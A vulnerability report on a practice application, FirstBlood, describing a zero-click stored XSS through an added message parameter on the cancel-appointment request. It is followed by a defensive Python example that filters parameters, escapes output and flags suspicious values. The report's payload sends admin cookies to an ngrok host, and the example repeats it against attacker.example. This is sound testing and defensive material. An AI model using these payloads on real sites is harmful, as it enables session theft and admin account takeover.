FirstBlood-#6740 click admin account takeover via stored xss on admin dashboard through cancel appointment.
This issue was discovered on FirstBlood v2.0.0 (issues patched)



On 2021-10-27, newrouge Level 3 reported:

Hey, I found that it is possible to exfiltrate admin cookies by planting a 0-click stored XSS on the admin dashboard through cancel appointment.

  • Looking back through cancelled appointments, every user has left a message with a cancellation reason. But when we cancel, there is no option to leave a message.
  • So, adding an extra parameter message= to the cancel request will send the message to the admin dashboard.
  • Now it is possible to execute XSS through this message on the admin dashboard and steal admin cookies.
  • Input is reflected inside the <a tag, which can be easily escaped with "> so that new HTML tags can be introduced easily.

Steps:

  1. Create an appointment and note down its ID.

  2. Go to manage appointment, click cancel appointment and intercept the request.

  3. Modify the request by adding a message parameter with your payload to extract cookies.

  4. Send the request.

  5. Now, as an admin, go to /drpanel/cancelled.php to check the cancelled appointment.

  6. You will be redirected to attacker's domain the moment you visit the page, without any click.

  7. Now the attacker can log in to the admin account with this cookie.

Thank you

newrouge

P2 High

Endpoint: /drpanel/cancelled.php

Parameter: message=

Payload: hello"><script>document.location=`http://ca7f-45-118-159-250.ngrok.io/${document.cookie}`</script/x>


FirstBlood ID: 22
Vulnerability Type: Stored XSS

Whilst an attempt was made to fix the stored XSS vulnerability in managing an appointment, it actually introduced new issues, such as when creating and editing an appointment and not just when cancelling it. Making use of htmlentities() and relying on .value() in JavaScript to encode certain characters does not prevent XSS overall. The 'fix' to this issue also leaves admins vulnerable on cancelled appointments.
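The two defensive points above (an unexpected message= parameter being stored, and the reason being written into an attribute without context-aware escaping) are shown in the following added example. It is not FirstBlood's code: the function names, the id parameter, the row markup and the sample payload are assumptions constructed for illustration.

```python
import html
from urllib.parse import parse_qs

# Constructed model of the cancel flow, not FirstBlood's implementation.
# The cancel request only needs the appointment id; anything else is dropped.
ALLOWED_CANCEL_PARAMS = {"id"}


def parse_cancel_request(body: str) -> dict:
    """Parse the cancel request body and keep only allow-listed parameters.
    An unexpected field such as message= is discarded rather than stored."""
    fields = {k: v[0] for k, v in parse_qs(body, keep_blank_values=True).items()}
    return {k: v for k, v in fields.items() if k in ALLOWED_CANCEL_PARAMS}


def render_cancelled_row(appt_id: str, reason: str) -> str:
    """Render one row of the cancelled-appointments view.

    The reason is emitted both as an attribute value and as a text node.
    html.escape(quote=True) encodes & < > " and ', so a value cannot close
    the quoted attribute or open a new tag in either context."""
    safe_id = html.escape(appt_id, quote=True)
    safe_reason = html.escape(reason, quote=True)
    return (
        f'<a href="/drpanel/appointment.php?id={safe_id}" title="{safe_reason}">'
        f"{safe_reason}</a>"
    )


def is_breakout_attempt(value: str) -> bool:
    """Detection heuristic for stored values: an attribute terminator followed
    by a tag start, or a script tag, is worth an alert on the cancel endpoint."""
    lowered = value.lower()
    return '">' in lowered or "'>" in lowered or "<script" in lowered


if __name__ == "__main__":
    # Constructed request body mirroring the report: an extra message= field.
    payload = 'hello"><script>document.location=`https://attacker.example/${document.cookie}`</script/x>'
    kept = parse_cancel_request(f"id=22&message={payload}")
    print("stored fields:", kept)
    print("flagged:", is_breakout_attempt(payload))
    print(render_cancelled_row("22", payload))
```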